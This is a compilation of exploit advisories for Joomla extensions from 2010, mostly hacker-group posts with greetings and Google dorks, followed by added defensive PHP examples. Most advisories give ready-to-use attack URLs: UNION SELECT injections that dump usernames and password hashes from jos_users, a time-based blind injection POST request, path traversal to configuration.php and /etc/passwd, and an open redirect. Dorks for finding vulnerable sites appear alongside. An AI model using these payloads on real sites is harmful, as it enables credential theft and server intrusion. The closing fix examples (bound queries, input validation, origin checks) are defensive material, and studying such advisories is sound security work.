Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities:
---------------------------------------------------------------------------------
Joomla Component JE FAQ Pro : Multiple Remote Blind Sql Injection
---------------------------------------------------------------------------------
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios[at]gmail[dot]com
Date : 2010-08-30
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JE FAQ Pro
version : 1.5.0
Price : 1 year: 13.08$, 2 Year: 18.31$, 3 Year: 23.54$, 4 Year: 26.16$
Developer : J Extension
License : GPLv2 or later type : Commercial
Date Added : 28 August 2010
Download : http://www.jextn.com/joomla-faq-component-extensions-downloads/
Demo : http://www.joomla-faq-demo.jextn.com/
Description :
JE FAQ Pro is an easy to use but powerful and excellent FAQ management.
Our core competency from our front end and backend features will make you
to sit suitable because we take care of your needs in the FAQ Joomla component
needs. This is where we extending the suitability in Joomla.
Multiple Blind SQL Injection
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2[bsql]
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2[bsql]
Joomla PicSell Component (com_picsell) Local File Disclosure Vulnerability
# Author: Craw
# Email: [email protected]
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
=======================================================
[+] ExploiT :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
[+] Example :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
=======================================================
Greetz @ LUXEMBOURG
=======================================================
Joomla 1.5 URL Redirecting Vulnerability
============================================
Joomla! (Multiple) ExploiT
============================================
# Powered Joomla! 1.5 & All version Down (Multiple)
# Author: Mr.MLL
# Published: 2010-08-24
# Verified: yes
# Download Exploit Code
# Download N/A
===
# Software : http://www.joomla.org/download.html
# Vendor : http://www.joomla.org/
# Contact : [email protected]
===
<?php
    }
    if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
        // checks for the presence of a return url
        // and ensures that this url is not the registration or login pages
        // If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $return );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) );
        }
    } else {
        // If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $mosConfig_live_site .'/index.php' );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) );
        }
    }
} else if ($option == 'logout') {
    $mainframe->logout();
    // JS Popup message
    if ( $message ) {
?>
=========
# ExploiT
http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/
=========
Joomla Component (com_zoomportfolio) SQL Injection Vulnerability
---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (id) Remote Sql Injection
---------------------------------------------------------------------------------
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : [email protected]
Date : 23 August 2010
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Zoom Portfolio --Joomla Portfolio Component
version : 1.5
Price : $20.00
Developer : EGBZOOM
License : GPLv2 or later type : Commercial
Date Added : 21 August 2010
Download : http://www.egbzoom.com/joomla-portfolio-component.html
Description :
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort. The Component has features like add category,
add images, settings, add portfolio. Zoom Portfolio includes automatic thumbnail creation,
captioning, searching and more. It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presence. It is directed at artists of all walks of life, it is very easy to install
and customize, and it is just simply stunning.
-------------------------
How to exploit
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
-------------------------
Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities
Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities
Name Biblioteca
Vendor http://www.cielostellato.info
Versions Affected 1.0 Beta
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-21
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
Component that allows the automatic management of a
library in electronic format. It can manage books and
their loans through an attractive graphical user
interface simple and usable.
II. DESCRIPTION
_______________
This component doesn't use the common Joomla functions
to get the parameters' values from GET, POST etc., and
all of these are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
B) Multiple SQL Injection
A) Multiple Blind SQL Injection
_______________________________
The parameter testo passed to bi.php (site and admin
frontends) is properly sanitised before being used in a
SQL query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
B) Multiple SQL Injection
_________________________
The parameter testo passed to stampa.php, pdf.php and
models/biblioteca.php (when "view" is set to "biblioteca"
) is properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
V. FIX
______
No fix.
Joomla Component com_zina SQL Injection Vulnerability
# Exploit Title: Joomla Component com_zina SQL Injection Vulnerability
# Date: 21-08-2010
# Author: Th3 RDX
# Software Link:http://www.pancake.org/zina/
# Version: 2.x
# Tested on: Demo Site
# category: webapp
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
I Love Faith :)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky
(Indishell.in)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Big Hugs to >:D< : Br0wn Sug4r, Sid3^effects, L0rd CruSad3r, Sonic ,
r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
[email protected]
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Joomla Component com_zina SQL Injection Vulnerability
----- [ Vendor ] -----
http://www.pancake.org/zina/
%\\
##############################################################################
##############################################################################
%//
----- [ Injection (s) ] -----
----- [ SQL Injection ] -----
Put [BSQLi CODE]
[Link] http://joomla/index.php?option=com_zina&view=zina&Itemid=9[SQLi CODE]
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN
=> c0d3 for motherland, h4ck for motherland
==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
Bug discovered : 21 August 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#
Joomla Component com_extcalendar Blind SQL Injection Vulnerability
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
Joomla Component com_extcalendar Blind SQL Injection Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# Date: 20/08/2010 0
# Author : Lagripe-Dz 1
# contact : [email protected] 8
# Home : Algeria 1
# Category: webapps/0day 0
# Tested on: [ win xp sp2 ] 8
# Dork allinurl:"com_extcalendar" 1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
[+] Vulnerable File :
http://www.site.com/[PATH]/components/com_extcalendar/cal_popup.php?extmode=view&extid=[BLIND_SQL]
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
Greetz 2 Allah and Ramadan Karim
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================
Author : _aL_Bayraqim_
Homepage : http://www.1923turk.com
BORDO BERELİLER GRUP KOMUTANLIGI
..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mücahit...!
===================================================
[+]G00gle Dork :index.php?option=com_ongallery
[+] Vulnerable File :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]
[+] ExploiT :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
===================================================
The martyr came, and mortality proved a lie; he left, and his immortality proved true. You carcasses going through life, who will resurrect you?..
===================================================
Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability
Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability
Name Jgrid
Vendor http://datagrids.clubsareus.org
Versions Affected 1.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-14
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
DATA GRID Component built on the popular EXTJS Framework.
II. DESCRIPTION
_______________
A parameter is not properly sanitised before being used
by the require_once function.
III. ANALYSIS
_____________
Summary:
A) Local File Inclusion
A) Local File Inclusion
_______________________
The controller parameter in jgrid.php is not sanitised
before being used by the PHP function require_once().
This allows a guest to include local files. The following
is the affected code:
if($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
IV. SAMPLE CODE
_______________
A) Local File Inclusion
http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
V. FIX
______
No fix.
Joomla Component (com_equipment) SQL Injection Vulnerability
# Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability
# Date : 16 - 8 - 2010
# Author : Forza-Dz
# Vendor : http://joomlaequipment.com/
# Version : All Versions
# Tested on : Win Sp2 and Mac
############################################################
Dork = inurl:"com_equipment"
############################################################
--- SQL Injection Vulnerability ---
SQL Injection Vulnerability component "com_equipment"
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_equipment&view=details&id=[SQL]
or
http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[SQL]
############################################################
===[Injection]===
[SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[SQL] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users--
[SQL] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
############################################################
Greetz @ MCA-CRB All "DZ" "MusliM"
############################################################
======[saha fotorkom]======
############################################################
Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities
Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities
Name Teams
Vendor http://www.joomlamo.com
Versions Affected 1_1028_100809_1711
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-10
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
Teams is a base application for entering leagues, teams,
players, uniforms, and games.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
A) Multiple Blind SQL Injection
_______________________________
Many parameters are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
IV. SAMPLE CODE
_______________
A) Multiple Blind SQL Injection
POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task=save&controller=player
V. FIX
______
No fix.
Joomla Yellowpages SQL Injection Vulnerability
===============================================================
Joomla Component (com_yellowpages) SQL Injection Vulnerability
===============================================================
# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability
# Date : 9- 8 - 2010
# Author : _aL_bayraqim_
# BORDO BERELİLER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
############################################################
Dork = inurl:/index.php?option=com_yellowpages
############################################################
--- SQL Injection Vulnerability ---
SQL Injection Vulnerability component "com_yellowpages"
http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################
#.Turkish son, !!..Turkish daughter !!..Protect your Turkishness!..
############################################################
There are many users who run Joomla. This is so they can see some of the flaws it has, and so they can fix them. Regards.
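For the SQL injection advisories above (numeric parameters such as catid, id and PlayerID, and the free-text testo parameter in Biblioteca), this added example shows strict integer validation and a bound LIKE search. It is not code from any of the components; the table, columns and function names are constructed, and PDO with the SQLite driver is assumed so it runs offline.

```php
<?php
// Added example, not the components' code. Table, column and function names
// are constructed; PDO + SQLite is an assumption so the demo runs offline.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE books (id INTEGER PRIMARY KEY, catid INTEGER, title TEXT)');
$db->exec("INSERT INTO books (catid, title) VALUES
           (2, 'SQL basics'), (2, '100% PHP'), (3, 'Joomla guide')");

// Numeric parameters: the whole value must be a non-negative decimal
// integer, otherwise the caller gets null and should refuse the request.
function int_param($raw): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 0)));
    return $v === false ? null : $v;
}

function titles_in_category(PDO $db, int $catid): array
{
    $st = $db->prepare('SELECT title FROM books WHERE catid = :c ORDER BY id');
    $st->execute(array(':c' => $catid));
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// Free-text search: bind the value, and escape LIKE wildcards so that a
// '%' or '_' typed by the user is matched literally.
function search_titles(PDO $db, string $testo): array
{
    $esc  = strtr($testo, array('\\' => '\\\\', '%' => '\\%', '_' => '\\_'));
    $st   = $db->prepare(
        "SELECT title FROM books WHERE title LIKE :t ESCAPE '\\' ORDER BY id");
    $st->execute(array(':t' => '%' . $esc . '%'));
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs, including values in the shape the advisories show.
foreach (array('2', '-1 order by 1--', '2 AND 1=1') as $raw) {
    $id = int_param($raw);
    echo str_pad($raw, 18), ' => ',
        $id === null ? 'rejected' : json_encode(titles_in_category($db, $id)), "\n";
}
$searches = array('100%', '%',
    "-a%' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users#");
foreach ($searches as $testo) {
    echo json_encode($testo), ' => ', json_encode(search_titles($db, $testo)), "\n";
}
```

Inside Joomla 1.5 the corresponding calls are JRequest::getInt() for numeric parameters and the database object's Quote() and getEscaped() methods for strings.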
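For the URL redirecting advisory above, where the return value reaches mosRedirect() after only two strpos() checks, this added example validates the target against the site's own origin. It is not Joomla's code: safe_return_url() is a hypothetical helper and $liveSite stands in for $mosConfig_live_site.

```php
<?php
// Added example, not Joomla's code. safe_return_url() is a hypothetical
// helper; $liveSite stands in for $mosConfig_live_site from the excerpt.

function safe_return_url(string $return, string $liveSite): string
{
    $home = rtrim($liveSite, '/') . '/index.php';

    // Control characters, spaces and backslashes have no place in a return
    // URL and are a common source of parser disagreement.
    if ($return === '' || preg_match('/[\x00-\x20\x7F\\\\]/', $return)) {
        return $home;
    }
    $target = parse_url($return);
    $site   = parse_url($liveSite);
    if ($target === false || $site === false) {
        return $home;
    }
    // Relative reference (no scheme, no host): keep it under the site root.
    if (!isset($target['scheme']) && !isset($target['host'])) {
        return rtrim($liveSite, '/') . '/' . ltrim($return, '/');
    }
    // Absolute or protocol-relative: scheme, host and port must all match.
    $same = isset($target['scheme'], $target['host'],
                  $site['scheme'], $site['host'])
        && strcasecmp($target['scheme'], $site['scheme']) === 0
        && strcasecmp($target['host'], $site['host']) === 0
        && ($target['port'] ?? null) === ($site['port'] ?? null);

    return $same ? $return : $home;
}

// Constructed demo using the site and return values shown in the advisory.
$liveSite = 'http://127.0.0.1/path';
$samples  = array(
    'http://Google.com/',                                  // off-site
    '//Google.com/',                                       // protocol-relative
    'index.php?option=com_content',                        // relative, on-site
    'http://127.0.0.1/path/index.php?option=com_content',  // absolute, on-site
);
foreach ($samples as $r) {
    printf("%-52s -> %s\n", $r, safe_return_url($r, $liveSite));
}
```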
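For the Jgrid local file inclusion above, where the controller parameter is concatenated into require_once(), this added example resolves the name against the controllers directory before anything is loaded. It is not the component's code: resolve_controller() and the temporary directory layout are hypothetical and constructed for the demo.

```php
<?php
// Added example, not the Jgrid component's code. resolve_controller() and
// the temporary directory layout are hypothetical, constructed for the demo.

/**
 * Map a request value to a controller file, or return null when the value
 * is not a plain name that resolves inside $controllersDir.
 */
function resolve_controller(string $name, string $controllersDir): ?string
{
    // 1. Plain identifier only: rejects '/', '\', '.' and NUL bytes outright.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name)) {
        return null;
    }
    // 2. Canonicalise and confirm the file sits directly under the base dir
    //    (this also rejects symlinks that point somewhere else).
    $base = realpath($controllersDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: one real controller, then hostile and malformed names.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'jgrid_demo_' . getmypid();
mkdir($dir . '/controllers', 0700, true);
file_put_contents($dir . '/controllers/grid.php', "<?php // constructed\n");

$inputs = array(
    'grid',                                  // legitimate
    "../../../../../../../../etc/passwd\0",  // value from the advisory, decoded
    'grid.php',                              // extension supplied by caller
    'missing',                               // well-formed, but no such file
);
foreach ($inputs as $in) {
    $file = resolve_controller($in, $dir . '/controllers');
    printf("%-40s %s\n", addcslashes($in, "\0"),
        $file === null ? 'rejected' : 'require_once ' . basename($file));
}

unlink($dir . '/controllers/grid.php');
rmdir($dir . '/controllers');
rmdir($dir);
```

Inside Joomla 1.5, reading the parameter with JRequest::getCmd() or JRequest::getWord() instead of JRequest::getVar() applies a comparable character filter at the point of input.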